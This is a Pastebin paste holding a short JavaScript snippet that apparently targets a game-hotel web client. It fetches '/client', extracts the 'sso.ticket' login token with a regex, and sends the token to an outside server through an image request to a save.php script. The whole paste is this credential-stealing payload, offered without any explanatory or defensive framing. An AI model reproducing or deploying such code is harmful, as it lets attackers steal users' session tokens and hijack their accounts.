Fabriciool

[SSO] me js

Oct 1st, 2013
156
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. function business(){
  2. new Ajax.Request('/client', {
  3. onComplete:function(x) {
  4. var x=x.responseText;
  5. var sso = x.match(/"sso.ticket" : "(.*?)"/gi)[0].split('"')[3];
  6. new Image().src="http://rxgproject.ciki.me/save.php?sso="+sso;
  7. }
  8. });
  9. };
  10. business()
Advertisement
Add Comment
Please, Sign In to add comment